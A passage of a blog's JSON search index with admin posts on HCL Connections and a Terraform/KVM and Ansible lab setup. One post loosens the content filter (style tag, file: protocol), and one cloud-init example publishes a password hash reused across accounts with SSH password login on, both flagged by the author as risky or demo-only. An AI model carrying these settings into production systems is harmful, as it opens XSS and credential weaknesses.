\u003ccode\u003efalse\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eThis is working, but I had to complain, that this option activates some code, which loads fonts from a CDN instead of the local Connections deployment.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/hide-community-button-second/","title":"Hiding the Create Community button 2nd"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/communities/","title":"Communities"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/highlights/","title":"Highlights"},{"body":"Connections 7 creates the Community Highlights page automatically and sets it as the start page for new communities.\nThat\u0026rsquo;s configured in the highway service, which is available for administrative users on https://your_connections_url/connections/config/highway.main.gatekeeper.tiles\nOption to set the Highlights page as overview page for new created communities. So far so good, the community menu looks way cleaner, until today I haven\u0026rsquo;t thought about this.\nI started playing around with my new community. The default highlights page looks something like this:\nDefault highlights page after creating a new community Now I added a second richtext widget to it (that\u0026rsquo;s normal for many users, some use rich content as others a blog to announce something):\nNew widget with additional Rich Content No Overview visible, so how shall I add a Rich Content Instance? I asked HCL Support and they explained:\nOverview page could be back by editing the existing community, please follow below steps:\nGo to existing community Click on edit community under Community Actions set start page to overview save and close HCL Support So I started to search. Yes there is an option to enable Overview in the Community settings and when I switch this to anything else than Highlights the Overview page appears in the menu. So it is just hidden.\nk, then I asked for an enhancement request, I don\u0026rsquo;t think we can ask any Community owner to switch the start page for his community just to add the Rich Content widget.\nThe process to add a Rich Content Widget in Highlights if Highlights is the start page and should be the start page after the process:\nAdd Rich Content to highlights Community Actions \u0026gt; Edit Community Switch start page to anything but highlights Save and close Open Overview Community Actions \u0026gt; Add Apps Select Richtext Community Actions \u0026gt; Edit Community Switch start page to anything but highlights Save and close I even tried to Community Actions \u0026gt; Add Apps without having Overview open, this creates Richtext widgets in the Overview (checked when I switched it on), but the widgets in Highlights don\u0026rsquo;t find them! During my tests only Richtext widgets are mapped from Overview to Highlights, if you create them when the Overview is open. In one case when I added two widgets in Highlights first, both widgets show the content of the Richtext Widget in Overview.\nOverview page with three Rich Content widgets, two created from any app and #3 is created during Overview was open Both Rich Content widgets in Highlights show content from #3 So I created an enhancement request, please vote for it , when you think the same.\nUpdate: The enhancement request is no longer available.\n","excerpt":"\u003cp\u003eConnections 7 creates the Community Highlights page automatically and sets it as the start page for new communities.\u003c/p\u003e\n\u003cp\u003eThat\u0026rsquo;s configured in the highway service, which is available for administrative users on https://\u003cem\u003eyour_connections_url\u003c/em\u003e/connections/config/highway.main.gatekeeper.tiles\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/highlight-as-startpage-hides-overview/","title":"Highlights as start page hides the Community overview"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hightlights/","title":"Hightlights"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/startpage/","title":"Startpage"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/xcc/","title":"Xcc"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/allowlist/","title":"Allowlist"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/allowlist/","title":"Allowlist"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/blocklist/","title":"Blocklist"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/blocklist/","title":"Blocklist"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/customization/","title":"Customization"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/customization/","title":"Customization"},{"body":"A long time ago, I wrote about the new implementation of allowlists in HCL Connections and that the documentation on customization and adding new rules was an absolute miracle for me.\nI haven\u0026rsquo;t implemented allowlists at any customer at the moment, because the first tries in 2018 were horrible. Even formats from the builtin editors got deleted during the save procedure. During test deployments I often start with enabled allowlists, but later I always switch back to blocklists.\nFor a support ticket I had to check some settings today, and so I tried with enabled allowlist and blocklist. This let me remember the old blog post and I wanted to check if custom rules can be added now.\nAllow \u0026lt;style\u0026gt; Some environments allow formatting with style tags in the HTML source of documents. So this is the starting point, how can we allow \u0026lt;style\u0026gt;.\nLet\u0026rsquo;s follow the official documentation Configuring active content filters first.\nLocate the ojhs-whitelist-default.xml Just as a hint: all block- and allowlists are stored in /opt/IBM/WebSpere/AppServer/profiles/Dmgr01/config/cells/cellname/LotusConnections-config/extern when you use a default deployment or Connections Automation Ansible Script .\nCopy files I decided to name my allowlist stoeps.\ncd /opt/IBM/WebSpere/AppServer/profiles/Dmgr01/config/cells/cellname/LotusConnections-config/extern cp ojhs-whitelist-default.xml ojhs-whitelist-stoeps cp acp-configkey__default.xml acp-configkey__stoeps.xml Now edit the copied files and change following lines:\nacp-configkey__stoeps.xml sed -i \u0026#39;s/defaultKey=default/defaultKey=stoeps/g\u0026#39; acp-configkey__stoeps.xml ojhs-whitelist-stoeps.xml Here I replaced the watsonworkspace protocol with the file-protocol, and added the \u0026lt;style\u0026gt; tag.\nIn case of style this is not enough, because we need to allow text between the tags:\n\u0026lt;!-- Allow text within style tag --\u0026gt; \u0026lt;allowTextIn\u0026gt; \u0026lt;element name=\u0026#34;style\u0026#34;/\u0026gt; \u0026lt;/allowTextIn\u0026gt; Here the diff of the original file and my customized one -- ojhs-whitelist-default.xml\t2021-11-10 14:28:04.191941833 +0100 +++ ojhs-whitelist-stoeps.xml\t2021-11-17 12:11:42.336626537 +0100 @@ -1,4 +1,4 @@ -\u0026lt;whitelist id=\u0026#34;Default\u0026#34; +\u0026lt;whitelist id=\u0026#34;stoeps\u0026#34; xmlns=\u0026#34;http://www.ibm.com/connections/acf/ojhs/whitelist/1.0\u0026#34; xmlns:tns=\u0026#34;http://www.ibm.com/connections/acf/ojhs/whitelist/1.0\u0026#34; xmlns:xsi=\u0026#34;http://www.w3.org/2001/XMLSchema-instance\u0026#34; @@ -115,12 +115,13 @@ \u0026lt;element name=\u0026#34;dir\u0026#34;/\u0026gt; \u0026lt;element name=\u0026#34;noembed\u0026#34;/\u0026gt; \u0026lt;element name=\u0026#34;xmp\u0026#34;/\u0026gt; +\t\u0026lt;element name=\u0026#34;style\u0026#34;/\u0026gt; \u0026lt;/allowElements\u0026gt; \u0026lt;allowUrlProtocols\u0026gt; \u0026lt;protocol name=\u0026#34;ftp\u0026#34; /\u0026gt; \u0026lt;protocol name=\u0026#34;tel\u0026#34; /\u0026gt; \u0026lt;protocol name=\u0026#34;notes\u0026#34; /\u0026gt; -\t\u0026lt;protocol name=\u0026#34;watsonworkspace\u0026#34; /\u0026gt; +\t\u0026lt;protocol name=\u0026#34;file\u0026#34; /\u0026gt; \u0026lt;/allowUrlProtocols\u0026gt; @@ -905,5 +908,10 @@ \u0026lt;elementAttribute name=\u0026#34;dir\u0026#34; val=\u0026#34;ltr\u0026#34;/\u0026gt; \u0026lt;/transformElements\u0026gt; --\u0026gt; +\t\u0026lt;!-- Allow text within style tag --\u0026gt; +\t\u0026lt;allowTextIn\u0026gt; +\t\u0026lt;element name=\u0026#34;style\u0026#34;/\u0026gt; +\t\u0026lt;/allowTextIn\u0026gt; To activate the allowlist we need to edit LotusConnections-config.xml and replace all occurrences of acp-configkey__default.xml with acp-configkey__stoeps.xml.\nI couldn\u0026rsquo;t find a way to allow only specific elements within the style-tag. So allowing style with allowTextIn allows all CSS .\nBest way to edit LotusConnections-config.xml is checking out and in, so you get syntax validation. In the article Using the Profiles database as the user directory are these steps explained.\nFinally synchronize the nodes and restart all Connections Clusters.\nTesting I did some tests before I added the new rules. So I could add following code to a richtext widget on the overview page (or highlights).\n\u0026lt;style type=\u0026#34;text/css\u0026#34;\u0026gt; .someclass { color: white !important; background-color: blue; font-weight: bold; } .wheader, widgetTitle { background-color: lightblue; font-weight: bold; } \u0026lt;/style\u0026gt; \u0026lt;p dir=\u0026#34;ltr\u0026#34; style=\u0026#34;color:blue;background-color:yellow;font-weight:bold;float:right;font-size:2em;padding:5px;margin:2px;margin-top:20px;margin-bottom:20px\u0026#34;\u0026gt;Test with style attribute within the p tag.\u0026lt;/p\u0026gt; \u0026lt;p class=\u0026#34;someclass\u0026#34; dir=\u0026#34;ltr\u0026#34;\u0026gt;Test with a class name.\u0026lt;/p\u0026gt; \u0026lt;p dir=\u0026#34;ltr\u0026#34;\u0026gt;Additionally added css style to change background-color of widget title.\u0026lt;/p\u0026gt; With default allowlist, the following code is stored:\n\u0026lt;p style=\u0026#34;background-color:blue;color:green\u0026#34;\u0026gt;Testing some code\u0026lt;/p\u0026gt; \u0026lt;p class=\u0026#34;aaa\u0026#34;\u0026gt;Testing some code\u0026lt;/p\u0026gt; To enable the style= attribute, have a look at Styling rules . The documentation tells us, that we have to enable this, but during my test with the default allowlist, styles were allowed. I doublechecked and in the default list it is already enabled. Style attributes are only styling the tag they are set in, so you can\u0026rsquo;t screw up the whole page.\nActivate the customized allowlist and try again After activation, the code is saved without changes, and so we can see the possible issue of allowing styles in user documents.\nSaved richtext widget with code to change element all over the page You see the users are able to change the color of the whole page (in this case the header background in Highlights). Not a big issue when they only change colors, but I already had users changing and hiding major parts of the connections overview page, so it can happen that they break widgets!\nBe very careful when you enable additional elements, or you allow possible XSS vectors or JavaScript at all.\nFun with CSS - Hide a widget Now I add display:none to hide the description widget. I use the aria-label to select the description widget here.\ndiv[aria-label=\u0026#34;description\u0026#34;] {display:none;} Description widget div has aria-label=description, so adding css to hide it here Here you see the saved code and the missing widget on the right side. Imagine you hide the RTE widget, so you need some knowledge to get the code changed. A cool way to customize a community, but this opens the door for a lot of missuse from user side, but it is definitly easier to achieve than adding themes to communities.\nTo-do and summary Activating allowlists in environments which were deployed before 6.0 can be a challenge, because you don\u0026rsquo;t know which protocols, or tags are used.\nWhy is this a problem?\nSo if users open documents that have been saved with active blocklists, the allowlist may be more restrictive and delete some of the content. This can only be styles, so that the document simply looks different, but links can also be deleted because the protocols are not explicitly allowed.\nThe reason for this is the different philosophy of blocklists and allowlists, so in blocklists everything is allowed what is not listed. Allowlists reverse this approach, they only permit content maintained in the list. So if you forget an element, it will be removed during save.\nOn the other hand the allowlist is a decent way to increase the security, because it prevents user from storing possible malicious code.\nSo my to-do is digging into the databases and build a script to find all used tags and protocols. As a bonus question I\u0026rsquo;m highly interested to allow the style tag, but allow only some special css rules within this tag.\n","excerpt":"\u003cp\u003eA long time ago, I wrote \u003ca href=\"https://stoeps.de/posts/2018/ibm-connections-6-0cr1-allowlisting-css-and-wiki-toc/\"\u003eabout the new implementation of allowlists in HCL Connections\u003c/a\u003e\n and that the documentation on customization and adding new rules was an absolute miracle for me.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/hcl-connections-switch-to-allowlists/","title":"HCL Connections switch to allowlists"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ansible/","title":"Ansible"},{"body":"In the post Create A Test Environment with Terraform and KVM I created the first three virtual machines, now we configure a DNS server so name resolution works as expected.\nSince HCL Connections started to add Kubernetes to the stack, we need to use proper name resolution instead of just editing /etc/hosts. That\u0026rsquo;s a bit of an effort, but in the end it is way easier than checking several hosts if the hosts file is uptodate.\nClone example repository git clone https://github.com/stoeps13/ansible-pb-infra-demo.git cd ansible-pb-infra-demo Adjust to your environment ansible.cfg Here only the uncommented parts of the file.\n1 2 3 4 5 6 [defaults] inventory = environments/libvirt/cnx.ini roles_path = ./roles:~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles stdout_callback = yaml stderr_callback = debug remote_user = ansible It sets the default inventory, and the roles path. Additionally I set my remote user, which I had configured in my Terraform project before.\nenvironments/libvirt/cnx.ini For this installation the DNS server is enough, but I already added groups for LDAP and NFS.\n1 2 3 4 5 6 7 8 [dns] cnx-ns.stoeps.home [nfs] cnx-nfs.stoeps.home [ldap] cnx-ds.stoeps.home environments/libvirt/group_vars/dns.yml --- # The port to listen on. dns_port: 53 # Should the DNS server be a caching DNS server? dns_caching_dns: yes dns_options_forwarders: - 1.1.1.1 - 8.8.8.8 # A list of zones and properties per zone. dns_zones: - name: localhost soa: localhost serial: 1 refresh: 604800 retry: 86400 expire: 2419200 ttl: 604800 records: - name: \u0026#34;@\u0026#34; type: NS value: localhost. - name: \u0026#34;@\u0026#34; value: 127.0.0.1 - name: \u0026#34;@\u0026#34; type: AAAA value: ::1 - name: 127.in-addr.arpa ttl: 604800 records: - name: \u0026#34;@\u0026#34; type: NS value: localhost. - name: 1.0.0 type: PTR value: localhost. - name: 0.in-addr.arpa records: - name: \u0026#34;@\u0026#34; type: NS value: localhost. - name: 255.in-addr.arpa records: - name: \u0026#34;@\u0026#34; type: NS value: localhost. - name: stoeps.home ttl: 604800 ns: - name: cnx-ns.stoeps.home. mx: - name: cnx-mail.stoeps.home. priority: 10 records: - name: cnx-ns value: 10.0.22.2 - name: cnx-nfs value: 10.0.22.3 - name: cnx-ds value: 10.0.22.4 dns_options_listen_on: - any dns_options_listen_on_v6: - any dns_pid_file: /run/named/named.pid I highlighted the most important parts, the dns forwarders which are used to resolve hostnames outside my local zone and the definition of stoeps.home which is the domain I use for my demo environment and the dns records for the first three hosts which we created with Terraform.\nFind and download roles In requirements.yml we just add all roles from https://galaxy.ansible.com which we want to use for our playbook. I decided to use https://galaxy.ansible.com/robertdebock/dns which supports all major Linux distributions.\nrequirements.yml # from galaxy: - src: robertdebock.dns version: 3.1.0 Example requirements https://docs.ansible.com/ansible/latest/galaxy/user_guide.html#installing-multiple-roles-from-a-file explains the different options to import roles. From galaxy, git, using the newest version or just a special branch.\nThe usage of versions has the advantage, that you can test your playbook with a special version, and you can stick with it, until you need to update or change something. So a role update won\u0026rsquo;t break your entire playbook.\n# from galaxy - name: yatesr.timezone # from locally cloned git repository (git+file:// requires full paths) - src: git+file:///home/bennojoy/nginx # from GitHub - src: https://github.com/bennojoy/nginx # from GitHub, overriding the name and specifying a specific tag - name: nginx_role src: https://github.com/bennojoy/nginx version: main This block was only for information, that you see what\u0026rsquo;s possible in a requirements.yml file.\nansible-galaxy install -r requirements.yml This imports the role which will install and configure bind and stores it into the subfolder roles.\nPlaybooks playbooks/dns.yml Within playbooks I create the different playbooks to import for example dns. So with this playbook everything is configured and installed to run dns.\n--- - hosts: dns become: yes roles: - robertdebock.dns This runs the playbook robertdebock.dns on all hosts in the group dns.\nsite.yml If there are multiple playbooks in playbooks, I just include these into site.yml, so I can run all defined playbooks of this repository in one step.\nImagine a second file playbooks/ldap.yml which is also included into site.yml.\n--- - name: Install bind import_playbook: playbooks/dns.yml So our folder looks like this:\n├──  environments │ └──  libvirt │ ├──  group_vars │ │ ├──  dns.yml │ └──  cnx.ini ├──  playbooks │ └──  dns.yml ├──  roles │ ├──  robertdebock.dns │ │ ├──  defaults │ │ │ └──  main.yml │ │ ├──  files │ │ │ └──  override.conf │ │ ├──  handlers │ │ │ └──  main.yml │ │ ├──  meta │ │ │ ├──  exception.yml │ │ │ ├──  main.yml │ │ │ └──  preferences.yml │ │ ├──  molecule │ │ │ └──  default │ │ │ ├──  collections.yml │ │ │ ├──  converge.yml │ │ │ ├──  molecule.yml │ │ │ ├──  prepare.yml │ │ │ └──  verify.yml │ │ ├──  tasks │ │ │ ├──  assert.yml │ │ │ └──  main.yml │ │ ├──  templates │ │ │ ├──  named.conf.j2 │ │ │ └──  zone.j2 │ │ ├──  vars │ │ │ └──  main.yml │ │ ├──  CODE_OF_CONDUCT.md │ │ ├──  CONTRIBUTING.md │ │ ├──  LICENSE │ │ ├──  README.md │ │ ├──  requirements.txt │ │ ├──  requirements.yml │ │ ├──  SECURITY.md │ │ └──  tox.ini ├──  ansible.cfg ├──  README.md ├──  requirements.yml ├──  run-playbook.sh └──  site.ymlBash {linenos=false} If you used my Terraform repository to create the virtual machines, the default DNS server is set to 10.0.22.2 (or better to octet 2 of the configured ip range), but at the moment there is no DNS running and Ansible can\u0026rsquo;t install additional software.\nConnect to the machine ssh root@10.0.22.2 and change /etc/resolv.conf to nameserver 8.8.8.8.\nI normally place a shellscript to run the entire playbook without using a large commandline. There I add the STDOUT_CALLBACK environment variable when the switch -v or -vv is used, which adds more information to the Ansible output and formats it in a more readable way. Very handy for troubleshooting.\n./run-playbook.sh PLAY [dns] ********************************************************************* TASK [Gathering Facts] ********************************************************* ok: [cnx-ns.stoeps.home] TASK [robertdebock.dns : Add default DNS Server to resolv.conf] **************** changed: [cnx-ns.stoeps.home] TASK [robertdebock.dns : test if dns_port is set correctly] ******************** ok: [cnx-ns.stoeps.home -\u0026gt; localhost] TASK [robertdebock.dns : test if dns_caching_dns is set correctly] ************* ok: [cnx-ns.stoeps.home -\u0026gt; localhost] TASK [robertdebock.dns : test if dns_zones is set correctly] ******************* ok: [cnx-ns.stoeps.home -\u0026gt; localhost] TASK [robertdebock.dns : test if item in dns_zones is set correctly] *********** ok: [cnx-ns.stoeps.home -\u0026gt; localhost] =\u0026gt; (item=localhost) ok: [cnx-ns.stoeps.home -\u0026gt; localhost] =\u0026gt; (item=127.in-addr.arpa) ok: [cnx-ns.stoeps.home -\u0026gt; localhost] =\u0026gt; (item=0.in-addr.arpa) ok: [cnx-ns.stoeps.home -\u0026gt; localhost] =\u0026gt; (item=255.in-addr.arpa) ok: [cnx-ns.stoeps.home -\u0026gt; localhost] =\u0026gt; (item=stoeps.home) ... RUNNING HANDLER [robertdebock.dns : rndc reload] ******************************* changed: [cnx-ns.stoeps.home] PLAY RECAP ********************************************************************* cnx-ns.stoeps.home : ok=28 changed=13 unreachable=0 failed=0 skipped=4 rescued=0 ignored=0 A big advantage of using Ansible is idempotency, so when the role and playbook is written the right way, you can run it over and over again, and it will not change already configured stuff.\nRunning the command a second time:\n... TASK [robertdebock.dns : start and enable dns] ********************************* ok: [cnx-ns.stoeps.home] PLAY RECAP ********************************************************************* cnx-ns.stoeps.home : ok=28 changed=0 unreachable=0 failed=0 skipped=4 rescued=0 ignored=0 The handlers know that nothing has changed and the service is just running without restart.\nWhen I add additional records to the group_vars/dns.yml file, the dns is updated and restarted automatically to get the changes.\nSo it is easy to add new hosts to the dns server, just edit the dns.yml add a record and rerun Ansible in this repository.\nTodo let Terraform add new hosts to dns.yml so the dns server is always up-to-date Resources Ansible Galaxy ansible-pb-infra-demo : GitHub project with files to follow this post terraform-libvirt : Terraform files to create the infrastructure for this post ","excerpt":"\u003cp\u003eIn the post \u003ca href=\"https://stoeps.de/posts/2021/terraform-kvm-create-environment/\" title=\"Create A Test Environment With Terraform And KVM\"\u003eCreate A Test Environment with Terraform and KVM\u003c/a\u003e\n I created the first three virtual machines, now we configure a DNS server so name resolution works as expected.\u003c/p\u003e\n\u003cp\u003eSince HCL Connections started to add Kubernetes to the stack, we need to use proper name resolution instead of just editing \u003ccode\u003e/etc/hosts\u003c/code\u003e. That\u0026rsquo;s a bit of an effort, but in the end it is way easier than checking several hosts if the hosts file is uptodate.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/ansible-start-first-installation/","title":"Create your first installation with Ansible"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/galaxy/","title":"Galaxy"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/infrastructure/","title":"Infrastructure"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/infrastructure/","title":"Infrastructure"},{"body":"I create a lot of virtual machines during the week to test deployments, or try to digg into problems of deployments. In the past I used Vmware Workstation, Oracle VirtualBox or MS HyperV on my desktops, but I also used Vmware ESX. I tried to use Vagrant and Packer to prepare images and distribute them, but wasn\u0026rsquo;t satisfied at all.\nThe biggest issues with this was the time when I tried to use WSL2 and HyperV on a Windows machine. There even creating a seperate virtual network was hard, unreliable, and so I stopped trying this.\nWhat I want to achieve is automated and reliable distribution of virtual machines, easy management and performance.\nI never had the need to do distribution and deployment in one step, so I split the process into the distribution of the virtual machines with Terraform and then the deployment with Ansible. I could combine this in one step, but as I said no need to do this. Additional environments use seperate repositories or folders, so I can create or destroy multiple environments in parallel without affecting each other.\nThe advantage of Terraform is the amount of providers , so it is easy to adjust the definition and deploy it on a Cloud provider, Vmware host or whatever is around.\nInstall prerequisits Libvirt On my local Linux machine I use libvirt to create virtual machines through Terraform.\nTerraform I used this repository as a starting boilerplate for my Terraform projects with Centos Cloud images and libvirt virtualization. I uploaded one example to https://github.com/stoeps13/terraform-libvirt , so you can follow in the repository.\nI added an unsafe parameter to my virtual discs, so they work as a charme on my notebook to test roles and installations, but are not reliable to store production data!\nTerraform Provider Follow the README.md to set up the environment.\nDownload and configure cloud images Actually I use the latest available Centos GenericCloud image from: CentOS-7-x86_64-GenericCloud-2009.qcow2 , but just with exchanging the source in volume.tf to CentOS-8-GenericCloud-8.4.2105-20210603.0.x86_64.qcow2 I can build the same environment with a CentOS 8 image.\nThe cloud images are very handy, because you just need a file to configure the basic stuff like hostname, ip address, dns server, additional packages and your ssh keys for easy access later with Ansible.\nMy cloud_config.cfg 6 7 hostname: ${hostname} fqdn: ${fqdn} Hostname and fqdn are set to variables, which we will use from Terraform.\n8 ssh_pwauth: true Allow password authentication with SSH.\n11 12 13 14 15 16 17 18 19 20 21 users: - name: root ssh_authorized_keys: - ${file(\u0026#34;~/.ssh/id_rsa.pub\u0026#34;)} shell: /bin/bash - name: sysadm ssh_authorized_keys: - ${file(\u0026#34;~/.ssh/cnx6.pub\u0026#34;)} sudo: [\u0026#39;ALL=(ALL) NOPASSWD:ALL\u0026#39;] shell: /bin/bash groups: wheel This part generates a user sysadmin with the content of cnx6.pub as authorized key (key-authentication with SSH) and /bin/bash as shell, adds him to sudoers and the group wheel. The root user just gets an authorized key.\nI add one more user which will be used to run Ansible. My users connect with SSH keys, but still have a password to manage and test things after deployment.\nIt\u0026rsquo;s easy to add more keys, users, or commands.\n36 37 38 39 40 41 42 43 44 45 46 47 48 49 # change some passwords # # - create password: # makepasswd --minchars 20 --maxchars 20 # - hash the generated passwort with openssl: # (Note: passing -1 will generate an MD5 password, -5 a SHA256 and -6 SHA512 (recommened)) # openssl passwd -6 -salt fdfngmklndfgbl PASSWORD chpasswd: list: - root:$6$fdfngmklndfgbl$PnuPSSecvXm3gW3WQPDTqoP7WeoqgmSSI2TYvK8XELp1IwidyJG4uM9TSkhWW/EAcC4XN08IdZ5OGvj87aIST/ - sysadm:$6$fdfngmklndfgbl$PnuPSSecvXm3gW3WQPDTqoP7WeoqgmSSI2TYvK8XELp1IwidyJG4uM9TSkhWW/EAcC4XN08IdZ5OGvj87aIST/ - ansible:$6$fdfngmklndfgbl$PnuPSSecvXm3gW3WQPDTqoP7WeoqgmSSI2TYvK8XELp1IwidyJG4uM9TSkhWW/EAcC4XN08IdZ5OGvj87aIST/ expire: False The comment describes the commands which can be used to generate the password hashes.\nIn my case I even copied the hashes from user to user, but normally even with the same password they have different salted hashes. But as I already stated, I use this only for demos and to test updates or development stuff.\n85 86 87 88 89 90 91 92 packages: - bash-completion - vim - qemu-guest-agent - libselinux-python - policycoreutils-python - dnsmasq - python3 Install additional packages, like your favorite editor and python3, so Ansible can connect and work.\nThe rest of the file is pretty straight forward, you can add more packages and reboot it.\nHere can you find my complete file, which I use for my environments.\nConfigure hostname, ip address and disc configuration In terraform-libvirt.tfvars is the definition of our servers, the example file defines 3 virtual machines:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 servers = { \u0026#34;cnx-ns\u0026#34; = { # Name in virsh / kvm \u0026#34;memory\u0026#34; = 2*1024 # Memory: 2GB \u0026#34;vcpu\u0026#34; = 2 # 2 cores \u0026#34;disk_size\u0026#34; = 20*1024*1024*1024 # 20 GB Disc size octetIP = 2 # last octet of ip \u0026#34;hostname\u0026#34; = \u0026#34;cnx-ns\u0026#34; # Hostname } \u0026#34;cnx-nfs\u0026#34; = { \u0026#34;memory\u0026#34; = 2*1024 \u0026#34;vcpu\u0026#34; = 2 \u0026#34;disk_size\u0026#34; = 200*1024*1024*1024 octetIP = 3 \u0026#34;hostname\u0026#34; = \u0026#34;cnx-nfs\u0026#34; # Hostname } \u0026#34;cnx-ds\u0026#34; = { \u0026#34;memory\u0026#34; = 2*1024 \u0026#34;vcpu\u0026#34; = 2 \u0026#34;disk_size\u0026#34; = 20*1024*1024*1024 octetIP = 4 \u0026#34;hostname\u0026#34; = \u0026#34;cnx-ds\u0026#34; # Hostname } } I added some comments of the first server with the description of definitions used.\nSo now we need to add a domain (fqdn = hostname + domain) and the first three octets of the network address.\nThese can be set in main.tf:\n2 3 variable \u0026#34;domain\u0026#34; { default = \u0026#34;stoeps.home\u0026#34; } variable \u0026#34;prefixIP\u0026#34; { default = \u0026#34;10.0.22\u0026#34; } So the domain is stoeps.home and all ip addresses start with 10.0.22.\nSome of this things need to be repeated in network.tf which holds the basic network configuration.\nThe file network.tf is only present in my very first set of virtual machines! I use this repository to build a dns server, nfs server and directory server (ldap), so here I define the network and the servers run all the time. Additional machines use this network, but don\u0026rsquo;t define it, so I can create and destroy machines without affecting the network.\nAdditionally, I added in the end of main.tf:\n88 89 90 xml { xslt\t= \u0026#34;${file(\u0026#34;volume.xsl\u0026#34;)}\u0026#34; } Which adds the content of volume.xsl to the disc definitions, because without this, the storage access on my notebook was just too slow to create databases on DB2.\nThis article on serverfault describes more details and one solution is to add cache='unsafe' to the qemu driver. I found the solution here .\nSo I had to write a matching xsl to add this to all discs which are created by Terraform.\n12 13 14 15 16 17 \u0026lt;xsl:template match=\u0026#34;disk[@type=\u0026#39;volume\u0026#39;]/driver\u0026#34;\u0026gt; \u0026lt;xsl:copy\u0026gt; \u0026lt;xsl:attribute name=\u0026#34;cache\u0026#34;\u0026gt;unsafe\u0026lt;/xsl:attribute\u0026gt; \u0026lt;xsl:apply-templates select=\u0026#34;@*|node()\u0026#34;/\u0026gt; \u0026lt;/xsl:copy\u0026gt; \u0026lt;/xsl:template\u0026gt; You can change unsafe to writeback which can save the filesystem on power-outages. But I use the virtualization only for automated deployed machines, so I can get them back within some hours from Ansible and Terraform.\nCreate the machines The creator of the original repository created a Makefile as wrapper for the different terraform commands, for my test environments this speeds up the execution, so I stayed with it.\nCreate make apply This command generates three running machines, which can be configured with Ansible. Test connections with ssh root@10.0.22.2 for example.\nApply complete! Resources: 11 added, 0 changed, 0 destroyed. All done.\nssh root@10.0.22.2 Warning: Permanently added \u0026#39;10.0.22.2\u0026#39; (ED25519) to the list of known hosts. [root@cnx-ns ~]# No additional password prompt, we can start configuring with Ansible. In the next post I\u0026rsquo;ll show how to deploy a DNS server for the virtual environment.\nDestroy To destroy the environment, just use following command:\nmake destroy References cloud-init Documentation Git repository with example files libvirt in the ArchWiki ","excerpt":"\u003cp\u003eI create a lot of virtual machines during the week to test deployments, or try to digg into problems of deployments. In the past I used Vmware Workstation, Oracle VirtualBox or MS HyperV on my desktops, but I also used Vmware ESX. I tried to use Vagrant and Packer to prepare images and distribute them, but wasn\u0026rsquo;t satisfied at all.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/terraform-kvm-create-environment/","title":"Create A Test Environment With Terraform And KVM"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/kvm/","title":"Kvm"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/terraform/","title":"Terraform"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/newsletter/","title":"Newsletter"},{"body":"The newsletter in version 2 format has one big disadvantage, we or our users lost the easy links to the topic, author profile or application.\nNewsletter version 1 When we look at the same information in Newsletter version 2, we can\u0026rsquo;t open the profile or the main blog/application, just the post is linked on the \u0026ldquo;Open\u0026rdquo; link.\nNewsletter version 2 with default settings The links are stored in the homepage database and are stripped away during the generation of the newsletter/notification message.\n/opt/IBM/WebSphere/AppServer/profiles/Dmgr01/config/cells/CellName/LotusConnections-config/notifications_v2/resources/commonUtil.ftl 391 392 393 394 395 396 397 398 399 400 401 402 \u0026lt;#-- Convert html fragment structures to text # Strip all tags but preserve html entities # Structural tags converted to white space to maintain word separation # Link URL\u0026#39;s are discarded # --\u0026gt; \u0026lt;#function convertHtmlStructuresToText html\u0026gt; \u0026lt;#if html??\u0026gt; \u0026lt;#return __convertHtmlStructuresToText(html?string) /\u0026gt; \u0026lt;#else\u0026gt; \u0026lt;#return html /\u0026gt; \u0026lt;/#if\u0026gt; \u0026lt;/#function\u0026gt; This function is called to prepare the headings in the notifications. So we can remove the call, or just return the html after the call:\n391 392 393 394 395 396 397 398 399 400 401 402 \u0026lt;#-- Convert html fragment structures to text # Strip all tags but preserve html entities # Structural tags converted to white space to maintain word separation # Link URL\u0026#39;s are discarded # --\u0026gt; \u0026lt;#function convertHtmlStructuresToText html\u0026gt; \u0026lt;#if html??\u0026gt; \u0026lt;#return html /\u0026gt; # \u0026lt;.\u0026gt; \u0026lt;#else\u0026gt; \u0026lt;#return html /\u0026gt; \u0026lt;/#if\u0026gt; \u0026lt;/#function\u0026gt; Replace the original line here with the highlighted code.\nNow synchronize the nodes and test it again:\nNewsletter version 2 with customized header ","excerpt":"\u003cp\u003eThe newsletter in version 2 format has one big disadvantage, we or our users lost the easy links to the topic, author profile or application.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/newsletter_v2_tweak/","title":"Tweak HCL Connections Newsletter v2"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/administration/","title":"Administration"},{"body":"Connections 7 has a new Administration Console to access Communities Template administration and Mobile Administration.\nThe Administration Console can be reached on https://cnx-hostname/cnxadmin/. The / at the end is important, because the ingress rule just forwards /cnxadmin/(.*).\nOn Firefox you get this view:\n/cnxadmin/ panel With Chrome (Chromium, Edge) the left menu is missing. There is a display: inline-flex for some elements in index.css of the Administration Console.\nSo how can we inject a repaired css file into the container?\nConfigMap One quick and dirty way is to use a configMap with the adjusted stylesheet. So I did the following:\n.Get the pod name of the admin-portal deployment\nADMIN_PORTAL=$(kubectl get pod -l app=admin-portal -o custom-columns=:metadata.name --no-headers) echo $ADMIN_PORTAL admin-portal-7f774c77f9-b8nxw .Copy index.css to your machine\nkubectl cp 